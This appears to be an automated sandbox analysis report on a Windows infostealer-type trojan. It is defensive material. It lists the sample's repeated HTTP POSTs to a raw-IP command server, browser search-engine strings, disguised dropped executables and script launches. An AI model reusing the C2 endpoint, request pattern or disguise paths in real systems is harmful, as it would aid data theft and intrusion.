Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.96.180

Source: unknown

HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.96.180
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlon
Source: Providerbroker.exe, 00000005.00000002.2199739543.000000000331A000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_01006FAA

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File created: C:\Windows\PrintDialog\pris\spoolsv.exe			Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File created: C:\Windows\PrintDialog\pris\f3b6ecef712a24			Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100848E	0_2_0100848E
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_01017153	0_2_01017153
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010251C9	0_2_010251C9
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_01014088	0_2_01014088
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010100B7	0_2_010100B7
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010040FE	0_2_010040FE
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010143BF	0_2_010143BF
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010162CA	0_2_010162CA
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010032F7	0_2_010032F7
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100C426	0_2_0100C426
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0102D440	0_2_0102D440
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100F461	0_2_0100F461
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010177EF	0_2_010177EF
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100E9B7	0_2_0100E9B7
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_010319F4	0_2_010319F4
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100286B	0_2_0100286B
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0102D8EE	0_2_0102D8EE
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_01016CDC	0_2_01016CDC
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_01024F9A	0_2_01024F9A
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100EFE2	0_2_0100EFE2
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_01013E0B	0_2_01013E0B
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF848E90D68	5_2_00007FF848E90D68
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849042A80	5_2_00007FF849042A80
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849044AD0	5_2_00007FF849044AD0
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849030121	5_2_00007FF849030121
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849044978	5_2_00007FF849044978
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849035E55	5_2_00007FF849035E55
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF8490456B8	5_2_00007FF8490456B8
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF8490434FC	5_2_00007FF8490434FC
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849044DF2	5_2_00007FF849044DF2
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849043818	5_2_00007FF849043818
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849043EFA	5_2_00007FF849043EFA
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF849592B7A	5_2_00007FF849592B7A
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF848F20D68	12_2_00007FF848F20D68
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D2A80	12_2_00007FF8490D2A80
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D4AD0	12_2_00007FF8490D4AD0
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490C0121	12_2_00007FF8490C0121
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D4978	12_2_00007FF8490D4978
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490C5E55	12_2_00007FF8490C5E55
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D34FB	12_2_00007FF8490D34FB
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D4DF2	12_2_00007FF8490D4DF2
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D3818	12_2_00007FF8490D3818
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8490D3EFA	12_2_00007FF8490D3EFA
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8498620EE	12_2_00007FF8498620EE
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8496291F2	12_2_00007FF8496291F2

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AtVzwBvZ.log 6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: String function: 0101EB78 appears 39 times
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: String function: 0101F5F0 appears 31 times
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: String function: 0101EC50 appears 56 times

Source: 9FwQYJSj4N.exe

Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 9FwQYJSj4N.exe

Source: 9FwQYJSj4N.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/326@0/1

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_01006C74 GetLastError,FormatMessageW,

0_2_01006C74

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0101A6C2

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

File created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe

Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

File created: C:\Users\user\Desktop\IZCgKuwL.log

Jump to behavior

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

File created: C:\Users\user\AppData\Local\Temp\43XWJvtbUs

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Command line argument: sfxname	0_2_0101DF1E
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Command line argument: sfxstime	0_2_0101DF1E
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Command line argument: STARTDLG	0_2_0101DF1E

Source: 9FwQYJSj4N.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9FwQYJSj4N.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

